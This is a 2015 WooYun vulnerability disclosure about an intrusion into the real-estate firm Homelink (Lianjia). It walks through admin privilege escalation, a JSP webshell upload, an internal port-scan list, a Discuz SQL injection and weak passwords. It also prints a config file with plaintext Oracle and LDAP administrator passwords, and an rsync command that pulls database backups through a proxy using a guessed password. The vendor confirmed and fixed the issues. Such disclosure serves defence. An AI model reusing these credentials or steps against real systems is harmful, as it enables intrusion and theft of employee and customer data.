当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0130575

漏洞标题:链家地产某业务漏洞导致内网渗透暴露多个安全问题

相关厂商:homelink.com.cn

漏洞作者: redrain有节操

提交时间:2015-07-31 09:23

修复时间:2015-07-31 14:42

公开时间:2015-07-31 14:42

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-31: 细节已通知厂商并且等待厂商处理中
2015-07-31: 厂商已经确认,细节仅向厂商公开
2015-07-31: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

富还是你们富,没地方住诶
链家某业务逻辑问题可导致普通用户越权admin,任意文件上传后shell进入内网,随后发现其内网脆弱性。。。真的很脆弱,影响所有员工数据,用户数据(诸多北漂屌丝们),影响整个线上业务,猜密码大法好

详细说明:

url:http://119.254.70.121/
注册用户后居然能直接进行后台管理。。。

屏幕快照 2015-07-30 下午10.53.28.png


上传没有任何过滤,简单shell
http://119.254.70.121/https://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/video/PIC_0000001180.jsp
root权限,确定一下网段

屏幕快照 2015-07-30 下午10.54.56.png


随后探测性扫描一下网段的业务

172.16.4.15:80 OPEN
172.16.4.17:80 OPEN
172.16.4.18:80 OPEN
172.16.4.20:8080 OPEN
172.16.4.14:80 OPEN
172.16.4.30:8080 OPEN
172.16.4.19:8080 OPEN
172.16.4.26:80 OPEN
172.16.4.13:80 OPEN
172.16.4.11:80 OPEN
172.16.4.16:80 OPEN
172.16.4.33:80 OPEN
172.16.4.22:80 OPEN
172.16.4.24:80 OPEN
172.16.4.23:80 OPEN
172.16.4.30:80 OPEN
172.16.4.28:80 OPEN
172.16.4.29:80 OPEN
172.16.4.25:80 OPEN
172.16.4.31:80 OPEN
172.16.4.45:8080 OPEN
172.16.4.37:8080 OPEN
172.16.4.38:80 OPEN
172.16.4.47:80 OPEN
172.16.4.40:80 OPEN
172.16.4.48:80 OPEN
172.16.4.49:80 OPEN
172.16.4.46:80 OPEN
172.16.4.50:80 OPEN
172.16.4.54:80 OPEN
172.16.4.55:8080 OPEN
172.16.4.53:8080 OPEN
172.16.4.65:8080 OPEN
172.16.4.71:80 OPEN
172.16.4.72:80 OPEN
172.16.4.77:80 OPEN
172.16.4.81:8080 OPEN
172.16.4.78:80 OPEN
172.16.4.82:80 OPEN
172.16.4.86:80 OPEN
172.16.4.85:8080 OPEN
172.16.4.84:8080 OPEN
172.16.4.86:8080 OPEN
172.16.4.92:80 OPEN
172.16.4.93:80 OPEN
172.16.4.93:8080 OPEN
172.16.4.95:80 OPEN
172.16.4.97:8080 OPEN
172.16.4.63:80 OPEN
172.16.4.101:80 OPEN
172.16.4.103:80 OPEN
172.16.4.108:80 OPEN
172.16.4.113:80 OPEN
172.16.4.115:80 OPEN
172.16.4.116:80 OPEN
172.16.4.117:80 OPEN
172.16.4.118:8080 OPEN
172.16.4.120:80 OPEN
172.16.4.121:80 OPEN
172.16.4.123:80 OPEN
172.16.4.124:80 OPEN
172.16.4.105:80 OPEN
172.16.4.127:80 OPEN
172.16.4.129:80 OPEN
172.16.4.130:80 OPEN
172.16.4.134:80 OPEN
172.16.4.136:8080 OPEN
172.16.4.138:80 OPEN
172.16.4.139:80 OPEN
172.16.4.144:80 OPEN
172.16.4.145:8080 OPEN
172.16.4.149:80 OPEN
172.16.4.147:80 OPEN
172.16.4.148:8080 OPEN
172.16.4.152:80 OPEN
172.16.4.153:8080 OPEN
172.16.4.150:80 OPEN
172.16.4.159:80 OPEN
172.16.4.159:8080 OPEN
172.16.4.154:80 OPEN
172.16.4.155:80 OPEN
172.16.4.157:8080 OPEN
172.16.4.158:80 OPEN
172.16.4.157:80 OPEN
172.16.4.160:80 OPEN
172.16.4.162:80 OPEN
172.16.4.163:80 OPEN
172.16.4.165:80 OPEN
172.16.4.165:8080 OPEN
172.16.4.172:8080 OPEN
172.16.4.173:8080 OPEN
172.16.4.174:8080 OPEN
172.16.4.176:8080 OPEN
172.16.4.175:8080 OPEN
172.16.4.177:8080 OPEN
172.16.4.179:80 OPEN
172.16.4.183:80 OPEN
172.16.4.186:8080 OPEN
172.16.4.185:8080 OPEN
172.16.4.190:80 OPEN
172.16.4.191:80 OPEN
172.16.4.195:80 OPEN
172.16.4.193:8080 OPEN
172.16.4.194:80 OPEN
172.16.4.197:80 OPEN
172.16.4.193:80 OPEN
172.16.4.199:80 OPEN
172.16.4.202:8080 OPEN
172.16.4.204:80 OPEN
172.16.4.206:80 OPEN
172.16.4.210:80 OPEN
172.16.4.212:80 OPEN
172.16.4.216:80 OPEN
172.16.4.218:80 OPEN
172.16.4.220:80 OPEN
172.16.4.221:80 OPEN
172.16.4.219:8080 OPEN
172.16.4.222:80 OPEN
172.16.4.223:80 OPEN
172.16.4.224:80 OPEN
172.16.4.225:80 OPEN
172.16.4.227:80 OPEN
172.16.4.229:80 OPEN
172.16.4.228:80 OPEN
172.16.4.230:80 OPEN
172.16.4.231:80 OPEN
172.16.4.230:8080 OPEN
172.16.4.233:80 OPEN
172.16.4.236:80 OPEN
172.16.4.235:80 OPEN
172.16.4.238:80 OPEN
172.16.4.237:8080 OPEN
172.16.4.239:80 OPEN
172.16.4.241:80 OPEN
172.16.4.242:8080 OPEN
172.16.4.243:80 OPEN
172.16.4.245:80 OPEN
172.16.4.248:80 OPEN
172.16.4.250:80 OPEN
172.16.4.251:80 OPEN


http://172.16.4.245核心销售平台弱口令,简单看一下,基本销售业务都在眼皮下了

屏幕快照 2015-07-30 下午10.59.13.png


172.16.4.236是内部论坛,discuz7.2存在sqli
获取一下表前缀:dvbb_

屏幕快照 2015-07-30 下午11.01.25.png


简单证明一下数据

屏幕快照 2015-07-30 下午11.02.41.png


拿uc_key可getshell,拿member数据可脱员工数据过sso进一步玩其他业务
来翻一翻文件,发现好东西

#Created by JInto - www.guh-software.de
#Sun Jun 15 16:00:01 CST 2008
driverClassName=oracle.jdbc.driver.OracleDriver
# \u7531\u4E8E\u4F7F\u7528p6spy\u663E\u793Aheibernate\u7684sql\u53C2\u6570\uFF0C\u56E0\u6B64\u66FF\u6362\u9A71\u52A8\uFF0C\u5B9E\u9645\u9A71\u52A8\u5728 spy.properties\u91CC\u914D\u7F6E
#driverClassName=com.p6spy.engine.spy.P6SpyDriver
url=jdbc\:oracle\:thin\:@172.16.4.129\:1521\:hstudy
#url=jdbc\:oracle\:thin\:@localhost\:1521\:orcl
p.minIdle=20
password=hstudy
p.maxActive=100
sqlldrpath=sqlldr
username=hstudy
instance=orcl
#ldap
ldap.url=ldap://172.16.3.12:389/
ldap.userDN=cn=administrator,cn=users,dc=corp,dc=homelink,dc=com,dc=cn1
ldap.pwd=azAZ123$%^1
ldap.baseDN=OU\=\u5317\u4EAC\u94FE\u5BB6,DC\=corp,DC\=linkhome,DC\=com,DC\=cn1


数据库连接串和ldap认证都拿到了
http://172.16.4.30/users/sign_in
gitlab可通过ldap认证进入
http://passport.homelink.com.cn/cas/login?service=http://sm.lianjia.com/shiro-cas
http://172.16.4.38/login_page.php?return=index.php&error=1&username=admin&perm_login=0&secure_session=1
几个敏感业务也可通过员工sso认证后访问
有办公段,但考虑到大晚上就没撸员工办公段了
接下来就是用户数据了,rsync,密码一猜就中
proxychains rsync backuser@172.16.3.112::docfileDB/rmanbackup/
password:homelink

屏幕快照 2015-07-30 下午11.14.42.png

漏洞证明:

屏幕快照 2015-07-30 下午10.53.28.png


屏幕快照 2015-07-30 下午10.54.56.png


屏幕快照 2015-07-30 下午10.59.13.png


#Created by JInto - www.guh-software.de
#Sun Jun 15 16:00:01 CST 2008
driverClassName=oracle.jdbc.driver.OracleDriver
# \u7531\u4E8E\u4F7F\u7528p6spy\u663E\u793Aheibernate\u7684sql\u53C2\u6570\uFF0C\u56E0\u6B64\u66FF\u6362\u9A71\u52A8\uFF0C\u5B9E\u9645\u9A71\u52A8\u5728 spy.properties\u91CC\u914D\u7F6E
#driverClassName=com.p6spy.engine.spy.P6SpyDriver
url=jdbc\:oracle\:thin\:@172.16.4.129\:1521\:hstudy
#url=jdbc\:oracle\:thin\:@localhost\:1521\:orcl
p.minIdle=20
password=hstudy
p.maxActive=100
sqlldrpath=sqlldr
username=hstudy
instance=orcl
#ldap
ldap.url=ldap://172.16.3.12:389/
ldap.userDN=cn=administrator,cn=users,dc=corp,dc=homelink,dc=com,dc=cn1
ldap.pwd=azAZ123$%^1
ldap.baseDN=OU\=\u5317\u4EAC\u94FE\u5BB6,DC\=corp,DC\=linkhome,DC\=com,DC\=cn1

修复方案:

自查弱口令
尽快修改ldap等关键密码,以防gitlab代码被下后门
内网业务及时补丁
最后,最重要的一条修复建议:请减免房租造福屌丝

版权声明:转载请注明来源 redrain有节操@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-07-31 14:42

厂商回复:

谢谢,业务已经下线整改。

最新状态:

2015-07-31:已下线


漏洞评价:

评论

  1. 2015-07-31 13:04 | Me_Fortune ( 普通白帽子 | Rank:209 漏洞数:71 | I'm Me_Fortune)

    鸿宇牛!

  2. 2015-07-31 15:44 | 默之 ( 普通白帽子 | Rank:334 漏洞数:67 | 沉淀。)

    洞主你好,扫不同ip的80和8080端口使用什么?nmap吗?

  3. 2015-07-31 19:01 | redrain有节操 ( 普通白帽子 | Rank:183 漏洞数:26 | ztz这下子有165了!>_<'/&\)

    @默之 nmap有点慢,自己写一个py流量代理进去扫

  4. 2015-07-31 20:03 | 默之 ( 普通白帽子 | Rank:334 漏洞数:67 | 沉淀。)

    @redrain有节操 好,谢谢了

  5. 2015-07-31 22:03 | 小红猪 ( 普通白帽子 | Rank:194 漏洞数:30 | Wow~~~哈哈~~~)

    牛笔

  6. 2015-08-04 18:05 | aNsSe ( 路人 | Rank:0 漏洞数:2 | 独自一人走天下)

    已学习